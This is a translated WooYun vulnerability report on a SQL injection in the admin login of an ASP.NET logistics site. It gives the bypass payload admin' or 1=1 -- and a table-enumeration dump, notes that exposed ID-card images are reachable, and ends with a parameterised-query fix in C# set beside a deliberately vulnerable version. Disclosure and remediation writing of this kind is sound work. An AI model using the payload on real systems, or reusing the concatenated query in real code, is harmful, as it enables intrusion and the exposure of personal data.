WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops article reader -------- http://drop.zone.ci/
2016-05-31: Details sent to the vendor, awaiting vendor handling
2016-06-02: Vendor confirmed; details disclosed to the vendor only
2016-06-12: Details disclosed to core white hats and experts in the relevant field
2016-06-22: Details disclosed to regular white hats
2016-07-02: Details disclosed to intern white hats
2016-07-17: Details disclosed to the public
Backend login bypass / SQL injection
Entering admin' at http://**.**.**.**/manage/admin.aspx produces an error.
The login can be bypassed (using an older IE version such as IE6) with the username
admin' or 1=1 --
and any password.
The same spot is also SQL-injectable: 13 databases,
430 tables,
tens of millions of rows.
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
SELECT a.name, b.rows FROM sysobjects AS a INNER JOIN sysindexes AS b ON a.id = b.id WHERE (a.type = 'u') AND (b.indid IN (0, 1)) ORDER BY b.rows DESC [407]:
[*] SmtErrorLog, 59062443[*] MoneyRecord, 39373205[*] orderDetail, 59062447[*] haikwanDetail, 34760162[*] orderParent, 39373211[*] haikwanParent, 39373280[*] orderDetailHistory, 39373340[*] TotalAllImport, 39373451[*] ReProductPriceRecord, 39373599[*] ExpressImport, 39373754[*] ReOrderDeliveryRecord, 39373865[*] SenderByOrder, 39374318[*] PostTracesAreaBySpecialType, 39374460[*] FlytReceiveVolume, 39374559[*] goodsDetail, 39374676[*] ReceiveDetail, 39374790[*] TrackParentOrders, 39374932[*] OrderHistory, 59062498[*] OrderPerformanceUser, 39375129[*] TB_MailFilterList, 39375249[*] TransitLableListItem, 39375375[*] FlytLabelPrintHistory, 59062507[*] OrderSource, 39375561[*] OrderToTransactionRate, 39375633[*] OrderToOSOrder, 59062515[*] T_TestJJ, 39375753[*] OrderRemark, 39375829[*] OrderJJOverweight, 39375903[*] OrderQuantity, 59062525[*] FlytReceiveTemp, 39376037[*] RelatePPLToREPORTS, 39376119[*] OrderListItemType, 39376161[*] PickTempRecordDetail, 39376205[*] ReportEubUpWebTime, 39376269[*] OrderJJTemp_Bak, 39376324[*] ModifyPostTypeOrders, 39376401[*] ContactCustomerProgress, 36143082[*] QualityInspectionItem, 36143090[*] BatchTransitLableListItem, 36143094[*] BillReceive, 34760292[*] ActivitySource, 34760295[*] customSet, 30097463[*] OrderCoupon, 59062554[*] OrderSplitfactor, 36143104[*] FreightLog, 36143105[*] CreateTableID, 59062558[*] FGMSRecordInfo, 36143109[*] CreateBarCodeToUser, 30097479[*] Smt_Lin_OrderID, 59062565[*] ExpTrack, 31516705[*] goodsParent, 36143119[*] customSet_20140730, 34760317[*] ERPCustomCode, 59062575[*] OrderUsePoints, 59062578[*] GoodsTransferDetail, 59062580[*] ChangeTraceOrder, 36143128[*] QualityInspection, 
36143133[*] TransitNos, 36143136[*] CarTransportTimeout, 59062587[*] TransitLableList, 36143141[*] ReturnOrderListItem, 59062593[*] OrderBackFreight, 36143146[*] UPS_DHL_Remote_Area, 30097493[*] MoneyDelRecord, 59062601[*] OrderDeceiveLevel, 34760324[*] BatchTransitLableList, 28624602[*] CustomerDebtAlertHistory, 28624607[*] OrdersPrintNumber, 29749202[*] Outorder, 28624622[*] UpWebTimeByTraceID, 59062621[*] BatchPostyPKGDetail, 59062623[*] BatchPostyDetail, 34760339[*] BagListItem, 36143175[*] TwiceReceiptGoods, 59062631[*] userInfoHistory, 28624653[*] PostTracesByType, 34760344[*] FlytSecondaryReceivingInfo, 34760351[*] PickTempRecordParent, 34760353[*] VolumeWeightRecord, 31516769[*] ProfitMarginReport, 36143200[*] PostCounter_ProductFeature, 31516774[*] T_WT_ManageLog, 36143206[*] OrderMatchHistory, 36143209[*] OrderAuditLog, 59062651[*] TransportSingleDetail, 34760364[*] TrackingForCN, 34760366[*] TrackOrderInfo, 34760369[*] OrderAutoSplitLog, 34760367[*] LosingAccountHistory, 36143224[*] LosingAccount, 34760386[*] FlytFees, 31516803[*] MoneyInitializeRecord, 34760385[*] XMLFileContent, 59062660[*] eLogisticsOperateHistory, 36143233[*] SeaRailTransSitDetail, 34760402[*] Exchange_rateHistory, 59062664[*] RecordMatchPostType, 36143238[*] T_TrackOrdersLog, 7112250[*] FlytUserMailSend, 59062673[*] MultipleConditionOfPostType, 30097588[*] TransportSingle, 34760417[*] postTypeParent, 36143253[*] userInfo, 36143258[*] MoneyRecordTime, 7112344[*] T_WT_Manage, 36143261[*] CustomsBasedInformation, 34760429[*] Lostpkg_History, 7112378[*] OrderBlack, 39376378[*] RechargePrintRecord, 7112394[*] userInfo_bak20140926, 34760435[*] OrderTrackHistory, 7112421[*] userInfo_bak20140925, 7112431[*] OrderJJTemp, 34760440[*] OrderStatusSync, 59062715[*] ProcessCenterSet, 7112463[*] UserInfoTrack, 36143287[*] CustomsClearanceFee, 36143291[*] Charge, 36143295[*] ReturnOrderList, 7112519[*] NoPostal, 59062733[*] OrderError, 39376409[*] BatchProcessing, 39376445[*] 
OrderToServiceMailSend, 59062738[*] OrderRecordByPMC, 39376556[*] tmp_deal_orderData20150922, 39376592[*] tmp_deal_orderData20150922, 39376628[*] ChargeByCountry, 39376667[*] PkgToHongkongUnDelivered, 39376709[*] Receive_TraceID, 59062751[*] BatchPosty, 39376745[*] Lostpkg_Apply, 39376766[*] PostTypeOptionSortCode, 39376787[*] InfringementManage, 59062760[*] FlytZoneByCountry, 39376847[*] FlytPostZone, 39376874[*] ShipmentErrorOrder, 59062767[*] FlytPostRoundingByWeight, 39376919[*] PostTypeOperatHistory, 39376946[*] WMSBatchNo, 39376970[*] FreightSettingLog, 39377000[*] T_FreiPostOrderBatchNum, 39377021[*] conditionOfPostType, 36143325[*] MoneyResetRecord, 39377075[*] T_GoodsQuestionLog, 59062786[*] T_ChinaPostSenderInfo, 39377102[*] OUBShipmentData, 39377120[*] HKEms_charge, 39377138[*] PostLimited_RelatedProductLable, 39377162[*] PostTypeInProcessCenter, 39377195[*] TransitLableListRelatived, 39377234[*] BadAccount, 39377255[*] Temp_RegUserSendMailList, 39377282[*] SenderInformation, 39377309[*] QuestionVerify, 39377333[*] ResponsibilityEvents, 39377360[*] ErpAutoCheckOrder, 39377382[*] SMTAccount, 34760577[*] CMS_News, 36143374[*] T_FDS_WS_SyncLog, 7113615[*] T_WT_History, 7113626[*] CountryByPostType, 34760597[*] Customerhistory, 59063095[*] FeesDiscount, 59063118[*] T_ReturnOrderScanRemarks, 28625563[*] FlytPostTypeSpecialCost, 59063161[*] OrderLogisticsFreight, 59063183[*] PostAndRegeistCharge, 59063201[*] Charge_Other, 59063219[*] PostTypeCountryOption, 59063236[*] tablespaceinfo, 59063247[*] T_GoodsQuestionManagement, 34760820[*] PostType_MailTypeByGroup, 59063278[*] TrackCarrier, 59063289[*] Usps_labelArea, 59063303[*] postType, 7116992[*] CountrySortingNo, 59063320[*] ConfirmedTag, 59063328[*] OperHistory, 59063335[*] countrys, 59063347[*] NationalRegionCountry, 59063358[*] PostTypeOptions, 59063368[*] DataCountryCode, 59063380[*] OutboundCountryToZone, 31517189[*] UserAmazonAccount, 39377366[*] CountryHKAPVolumeMark, 28625954[*] ReturnMoneryApply, 
36143637[*] T_FreipostCountrys, 59063439[*] TrackCountry, 36143644[*] CountrySgEmsSortingNo, 59063463[*] PostTypeToTrackCarrier, 39377387[*] PostTypeToTrackCarrier, 59063491[*] SeaRailTransSit, 39377528[*] PremiumPriceInProcessCenter, 59063503[*] FlytSubmitProcessCenter, 39377692[*] PayPalAdvance, 39377810[*] ImpExcel, 59063530[*] ImpExcel, 59063537[*] ImpExcel, 59063542[*] GoodsTransfer, 59063549[*] Printshippingaddressconfig, 59063557[*] FgmsPrint, 59063565[*] FgmsPrint, 39378392[*] csv58039, 59063579[*] OrderParentExtend, 59063587[*] csv57880, 59063595[*] Cost_Charge, 59063601[*] PerformanceOfTypeDetail, 39378773[*] ExpressSetting, 39378881[*] EAExpense, 59063629[*] csv57822, 39379103[*] DownLoadHistory, 59063651[*] OrderErrorCode, 59063661[*] csv58460, 59063671[*] csv18981, 39379421[*] CustomerRankParameter, 39379502[*] BankAccount, 59063694[*] BankAccount, 59063704[*] FlytSetPostVolume, 59063709[*] FlytSetPostVolume, 59063721[*] relationOfUserGroup, 39379862[*] ImTrace, 59063740[*] HuijiangCNAMGZSenderInfo, 59063747[*] GroupRelateSeller, 59063760[*] GroupRelateSeller, 39380213[*] deliverAddress, 39380292[*] DeliverBank, 59063791[*] DeliverBank, 39380460[*] EADepartment, 59063802[*] ReturnImport, 36143763[*] TraceIdQueryCondition, 31517326[*] EfficiencyReport, 36143769[*] DGMESCharge, 34760995[*] usermenu, 28626138[*] csv70327, 59063859[*] csv70327, 31517348[*] Exchange_rate, 36143794[*] Exchange_rate, 59063880[*] HKDHLPartTable, 59063892[*] CustomerParameter, 59063905[*] ApiSignPlatform, 59063915[*] ApiSignPlatform, 28626174[*] ChinaPostPartTable, 59063935[*] ChinaPostPartTable, 30098161[*] ChinaPostPartTable, 59063954[*] ChinaPostPartTableSH, 59063962[*] csv58365, 34761055[*] PostTypeInProcessLog, 36143875[*] DeliverAddressToProcessCenter, 59063987[*] EAReimburseHistory, 59064001[*] ChannelNumberMapPostType, 59064007[*] CrossPostProblemOrder, 59064014[*] CrossPostProblemOrder, 59064023[*] CrossPostProblemOrder, 59064034[*] CrossPostProblemOrder, 59064044[*] 
EAReimburseAudit, 59064052[*] EAReimburseDetail, 59064058[*] BlackListPay, 36143908[*] BlackListPay, 59064076[*] csv19626, 59064086[*] csv19626, 36143933[*] MoneyAudit, 36143942[*] SystemConfig, 34761113[*] csv20453, 59064135[*] csv20453, 59064144[*] EAReimburse, 59064154[*] EAReimburse, 59064167[*] GlobalExpressRecord, 59064179[*] GlobalExpressRecord, 59064191[*] DHLPartTable, 36143997[*] GZEMSPartTable, 36144004[*] MailTypeByGroup, 36144009[*] PostTypeToStorage, 59064223[*] OutboundTraceIdFormat, 36144033[*] OutboundTraceIdFormat, 36144036[*] PostTypeByGroup, 59064239[*] ChannelScanHistory, 59064250[*] ChannelScanHistory, 36144051[*] EABankAccount, 59064266[*] ChannelScanListItem, 36144060[*] ChannelScanListItem, 59064285[*] ChannelScanListItem, 28626297[*] ChannelScanListItem, 34761233[*] ChannelScanListItem, 59064308[*] NationalRegion, 59064319[*] csv20531, 59064325[*] csv21877, 59064330[*] csv70402, 36144088[*] csv70402, 59064352[*] customerRank, 59064362[*] CustomServiceRecord, 36144108[*] images, 36144115[*] images, 36144120[*] images, 59064388[*] ChannelScanList, 59064397[*] EubApiRequester, 59064408[*] EubApiRequester, 36144133[*] EubApiRequester, 59064422[*] EubApiRequester, 59064429[*] EubApiRequester, 59064440[*] PerformanceOfType, 59064444[*] CMS_tbLink, 59064448[*] CMS_tbLink, 59064455[*] CMS_tbLink, 59064461[*] CMS_tbLink, 36144185[*] CMS_tbLink, 36144190[*] CMS_tbLink, 59064485[*] csv17186, 36144202[*] T_InformationCollectionLibrary, 59064494[*] ChannelChargeSetting, 59064504[*] ChannelChargeSetting, 36144220[*] ChannelChargeSetting, 59064513[*] ChannelChargeSetting, 36144235[*] ChannelChargeSetting, 59064525[*] ChannelChargeSetting, 36144241[*] csv21199, 59064536[*] csv21199, 59064544[*] csv21199, 59064553[*] csv21199, 34761367[*] csv70018, 59064572[*] csv70018, 36144279[*] csv70221, 59064590[*] csv70221, 59064601[*] SetFlytUserToPostTypeWhiteList, 59064611[*] BlacklistUsers, 59064617[*] BlacklistUsers, 36144308[*] BlacklistUsers, 59064632[*] 
BlacklistUsers, 59064638[*] BlacklistUsers, 36144320[*] BlacklistUsers, 36144334[*] BlacklistUsers, 7122255[*] BlacklistUsers, 59064694[*] BlacklistUsers, 36144346[*] BlacklistUsers, 39380511[*] BlacklistUsers, 39380547[*] BlacklistUsers, 39380595[*] BlacklistUsers, 59064735[*] BlacklistUsers, 59064745[*] BlacklistUsers, 39380819[*] BlacklistUsers, 39380880[*] BlacklistUsers, 59064776[*] BlacklistUsers, 59064785[*] BlacklistUsers, 39381030[*] BlacklistUsers, 39381068[*] BlacklistUsers, 59064803[*] BlacklistUsers, 39381156[*] BlacklistUsers, 59064821[*] BlacklistUsers, 59064833[*] BlacklistUsers, 39381243[*] BlacklistUsers, 39381276[*] BlacklistUsers, 59064858[*] BlacklistUsers, 39381325[*] BlacklistUsers, 36144499[*] BlacklistUsers, 59064881[*] CMS_NewMenu, 39381393[*] CMS_NewMenu, 59064898[*] CMS_NewMenu, 36144531[*] CMS_NewMenu, 39381462[*] CMS_NewMenu, 39381480[*] CMS_NewMenu, 59064923[*] CMS_NewMenu, 39381519[*] CMS_NewMenu, 39381549[*] CMS_NewMenu, 39381575[*] CMS_NewMenu, 39381600[*] CMS_NewMenu, 59064950[*] CMS_NewMenu, 39381636[*] CMS_NewMenu, 59064965[*] CMS_NewMenu, 7123442[*] CMS_NewMenu, 31517982[*] CMS_NewMenu, 59064988[*] CMS_NewMenu, 36144597[*] CMS_NewMenu, 59065002[*] CMS_NewMenu, 59065008[*] CMS_NewMenu, 34761585[*] CMS_NewMenu, 31517996[*] CMS_NewMenu, 36144639[*] CMS_NewMenu, 36144666[*] CMS_NewMenu, 59065109[*] CMS_NewMenu, 59065112[*] CMS_NewMenu, 31518049[*] CMS_NewMenu, 59065124[*] CMS_NewMenu, 36144688[*] CMS_NewMenu, 59065143[*] CMS_NewMenu, 59065152[*] CMS_NewMenu, 59065159[*] CMS_NewMenu, 36144702[*] csv10370, 34761622[*] csv10370, 36144707[*] csv10370, 34761626[*] csv10370, 59065196[*] csv10370, 59065203[*] csv10370, 59065212[*] csv10370, 59065218[*] csv10370, 34761637[*] csv10370, 59065234[*] csv10370, 59065242[*] csv10370, 7123780[*] csv10422, 59065258[*] csv13030, 36144746[*] csv13030, 36144753[*] csv13030, 36144762[*] csv13030, 59065292[*] csv13030, 36144785[*] csv13030, 36144794[*] csv13030, 59065315[*] csv13030, 59065321
A large number of ID-card images.
One field in the records stores the user's ID-card photo:
UserAmazonAccount
Use parameterised queries; the login logic of the login page needs to be changed.
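As an added illustration (not code from the original report or from the affected site), the C# below puts the kind of concatenated login query that admin' or 1=1 -- defeats next to a parameterised replacement of the sort the fix recommendation calls for. The LoginHandler class, the Admins table and its column names are assumptions; the hardened version assumes .NET Framework 4.7.2 or later (or .NET Core) for the Rfc2898DeriveBytes overload that takes a HashAlgorithmName.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Security.Cryptography;

// Hypothetical login handler; table and column names are assumptions, not taken from the report.
public class LoginHandler
{
    private readonly string _connectionString;

    public LoginHandler(string connectionString)
    {
        _connectionString = connectionString;
    }

    // BEFORE (the pattern behind the report): user input is spliced into the SQL text.
    // With the username  admin' or 1=1 --  the statement becomes
    //   ... WHERE Username = 'admin' or 1=1 --' AND Password = '...'
    // so the password check is commented out and COUNT(*) is never zero.
    // A lone  admin'  leaves an unbalanced quote, which is the error the report observed.
    public bool LoginVulnerable(string username, string password)
    {
        string sql = "SELECT COUNT(*) FROM Admins WHERE Username = '" + username +
                     "' AND Password = '" + password + "'";
        using (var conn = new SqlConnection(_connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            conn.Open();
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // AFTER: the username travels as a typed parameter, so quotes and comment markers
    // inside it are data, not SQL. The password never reaches the query; it is checked
    // against a salted PBKDF2 hash. All checks run here on the server, so a browser that
    // ignores client-side script (the IE6 trick in the report) gains nothing.
    public bool LoginParameterised(string username, string password)
    {
        const string sql = "SELECT PasswordHash, Salt FROM Admins WHERE Username = @username";
        using (var conn = new SqlConnection(_connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@username", SqlDbType.NVarChar, 64).Value = username;
            conn.Open();
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                if (!reader.Read())
                {
                    return false; // unknown user: same outcome as a wrong password
                }
                byte[] storedHash = (byte[])reader["PasswordHash"];
                byte[] salt = (byte[])reader["Salt"];
                byte[] candidate = DeriveKey(password, salt);
                return FixedTimeEquals(storedHash, candidate);
            }
        }
    }

    // PBKDF2-HMAC-SHA256, 100000 iterations, 32-byte output.
    private static byte[] DeriveKey(string password, byte[] salt)
    {
        using (var kdf = new Rfc2898DeriveBytes(password, salt, 100000, HashAlgorithmName.SHA256))
        {
            return kdf.GetBytes(32);
        }
    }

    // Compare two equal-length hashes without an early exit on the first differing byte.
    private static bool FixedTimeEquals(byte[] a, byte[] b)
    {
        if (a == null || b == null || a.Length != b.Length)
        {
            return false;
        }
        int diff = 0;
        for (int i = 0; i < a.Length; i++)
        {
            diff |= a[i] ^ b[i];
        }
        return diff == 0;
    }
}
```

The concatenation in LoginVulnerable is the pattern to search the code base for; with Parameters.Add, the same admin' or 1=1 -- input simply matches no row. Turning off detailed ASP.NET error pages (customErrors mode="On" in web.config) removes the error message that revealed the injection point, but that is a supplement to parameterisation, not a substitute for it.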
Severity: High
Vulnerability Rank: 11
Confirmed: 2016-06-02 18:13
CNVD has confirmed and reproduced the described situation and has notified the website operator by email through its publicly listed contact channel; the operator will provide a solution as a follow-up.
None yet